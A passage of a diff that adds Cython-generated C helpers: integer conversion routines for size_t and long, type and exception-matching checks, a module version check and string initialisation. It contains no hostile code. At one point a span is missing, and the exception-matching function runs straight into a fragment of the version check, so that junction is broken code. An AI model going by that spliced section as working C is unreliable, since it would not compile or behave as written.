PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 2 * PyLong_SHIFT)) { + return (size_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(size_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 3 * PyLong_SHIFT)) { + return (size_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(size_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 4 * PyLong_SHIFT)) { + return (size_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (size_t) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(size_t) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(size_t) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(size_t, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(size_t) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(size_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + return (size_t) ((((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(size_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + return (size_t) ((((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 4 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(size_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 4 * PyLong_SHIFT)) { + return (size_t) ((((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(size_t) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(size_t) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + size_t val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (size_t) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (size_t) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (size_t) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (size_t) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (size_t) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(size_t) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((size_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(size_t) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((size_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((size_t) 1) << (sizeof(size_t) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (size_t) -1; + } + } else { + size_t val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (size_t) -1; + val = __Pyx_PyInt_As_size_t(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to size_t"); + return (size_t) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to size_t"); + return (size_t) -1; +} + +/* FormatTypeName */ +#if CYTHON_COMPILING_IN_LIMITED_API +static __Pyx_TypeName +__Pyx_PyType_GetName(PyTypeObject* tp) +{ + PyObject *name = __Pyx_PyObject_GetAttrStr((PyObject *)tp, + __pyx_n_s_name); + if (unlikely(name == NULL) || unlikely(!PyUnicode_Check(name))) { + PyErr_Clear(); + Py_XSETREF(name, __Pyx_NewRef(__pyx_n_s__53)); + } + return name; +} +#endif + +/* CIntToPy */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(long) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(long) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(long) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(long), + little, !is_unsigned); + } +} + +/* CIntFromPy */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(long) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(long, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (long) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 2 * PyLong_SHIFT)) { + return (long) (((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 3 * PyLong_SHIFT)) { + return (long) (((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 4 * PyLong_SHIFT)) { + return (long) (((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(long) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(long) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) ((((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) ((((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) ((((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(long) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + long val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (long) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (long) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (long) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (long) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(long) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(long) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((long) 1) << (sizeof(long) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (long) -1; + } + } else { + long val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (long) -1; + val = __Pyx_PyInt_As_long(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to long"); + return (long) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to long"); + return (long) -1; +} + +/* FastTypeChecks */ +#if CYTHON_COMPILING_IN_CPYTHON +static int __Pyx_InBases(PyTypeObject *a, PyTypeObject *b) { + while (a) { + a = __Pyx_PyType_GetSlot(a, tp_base, PyTypeObject*); + if (a == b) + return 1; + } + return b == &PyBaseObject_Type; +} +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (a == b) return 1; + mro = a->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + if (PyTuple_GET_ITEM(mro, i) == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(a, b); +} +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (cls == a || cls == b) return 1; + mro = cls->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + PyObject *base = PyTuple_GET_ITEM(mro, i); + if (base == (PyObject *)a || base == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(cls, a) || __Pyx_InBases(cls, b); +} +#if PY_MAJOR_VERSION == 2 +static int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject* exc_type2) { + PyObject *exception, *value, *tb; + int res; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&exception, &value, &tb); + res = exc_type1 ? PyObject_IsSubclass(err, exc_type1) : 0; + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + if (!res) { + res = PyObject_IsSubclass(err, exc_type2); + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + } + __Pyx_ErrRestore(exception, value, tb); + return res; +} +#else +static CYTHON_INLINE int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject *exc_type2) { + if (exc_type1) { + return __Pyx_IsAnySubtype2((PyTypeObject*)err, (PyTypeObject*)exc_type1, (PyTypeObject*)exc_type2); + } else { + return __Pyx_IsSubtype((PyTypeObject*)err, (PyTypeObject*)exc_type2); + } +} +#endif +static int __Pyx_PyErr_GivenExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + assert(PyExceptionClass_Check(exc_type)); + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i '9'); + break; + } + if (rt_from_call[i] != ctversion[i]) { + same = 0; + break; + } + } + if (!same) { + char rtversion[5] = {'\0'}; + char message[200]; + for (i=0; i<4; ++i) { + if (rt_from_call[i] == '.') { + if (found_dot) break; + found_dot = 1; + } else if (rt_from_call[i] < '0' || rt_from_call[i] > '9') { + break; + } + rtversion[i] = rt_from_call[i]; + } + PyOS_snprintf(message, sizeof(message), + "compile time version %s of module '%.100s' " + "does not match runtime version %s", + ctversion, __Pyx_MODULE_NAME, rtversion); + return PyErr_WarnEx(NULL, message, 1); + } + return 0; +} + +/* InitStrings */ +#if PY_MAJOR_VERSION >= 3 +static int __Pyx_InitString(__Pyx_StringTabEntry t, PyObject **str) { + if (t.is_unicode | t.is_str) { + if (t.intern) { + *str = PyUnicode_InternFromString(t.s); + } else if (t.encoding) { + *str = PyUnicode_Decode(t.s, t.n - 1, t.encoding, NULL); + } else { + *str = PyUnicode_FromStringAndSize(t.s, t.n - 1); + } + } else { + *str = PyBytes_FromStringAndSize(t.s, t.n - 1); + } + if (!*str) + return -1; + if (PyObject_Hash(*str) == -1) + return -1; + return 0; +} +#endif +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t) { + while (t->p) { + #if PY_MAJOR_VERSION >= 3 + __Pyx_InitString(*t, t->p); + #else + if (t->is_unicode) { + *t->p = PyUnicode_DecodeUTF8(t->s, t->n - 1, NULL); + } else if (t->intern) { + *t->p = PyString_InternFromString(t->s); + } else { + *t->p = PyString_FromStringAndSize(t->s, t->n - 1); + } + if (!*t->p) + return -1; + if (PyObject_Hash(*t->p) == -1) + return -1; + #endif + ++t; + } + return 0; +} + +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char* c_str) { + return __Pyx_PyUnicode_FromStringAndSize(c_str, (Py_ssize_t)strlen(c_str)); +} +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject* o) { + Py_ssize_t ignore; + return __Pyx_PyObject_AsStringAndSize(o, &ignore); +} +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +#if !CYTHON_PEP393_ENABLED +static const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + char* defenc_c; + PyObject* defenc = _PyUnicode_AsDefaultEncodedString(o, NULL); + if (!defenc) return NULL; + defenc_c = PyBytes_AS_STRING(defenc); +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + { + char* end = defenc_c + PyBytes_GET_SIZE(defenc); + char* c; + for (c = defenc_c; c < end; c++) { + if ((unsigned char) (*c) >= 128) { + PyUnicode_AsASCIIString(o); + return NULL; + } + } + } +#endif + *length = PyBytes_GET_SIZE(defenc); + return defenc_c; +} +#else +static CYTHON_INLINE const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + if (unlikely(__Pyx_PyUnicode_READY(o) == -1)) return NULL; +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + if (likely(PyUnicode_IS_ASCII(o))) { + *length = PyUnicode_GET_LENGTH(o); + return PyUnicode_AsUTF8(o); + } else { + PyUnicode_AsASCIIString(o); + return NULL; + } +#else + return PyUnicode_AsUTF8AndSize(o, length); +#endif +} +#endif +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject* o, Py_ssize_t *length) { +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT + if ( +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + __Pyx_sys_getdefaultencoding_not_ascii && +#endif + PyUnicode_Check(o)) { + return __Pyx_PyUnicode_AsStringAndSize(o, length); + } else +#endif +#if (!CYTHON_COMPILING_IN_PYPY && !CYTHON_COMPILING_IN_LIMITED_API) || (defined(PyByteArray_AS_STRING) && defined(PyByteArray_GET_SIZE)) + if (PyByteArray_Check(o)) { + *length = PyByteArray_GET_SIZE(o); + return PyByteArray_AS_STRING(o); + } else +#endif + { + char* result; + int r = PyBytes_AsStringAndSize(o, &result, length); + if (unlikely(r < 0)) { + return NULL; + } else { + return result; + } + } +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject* x) { + int is_true = x == Py_True; + 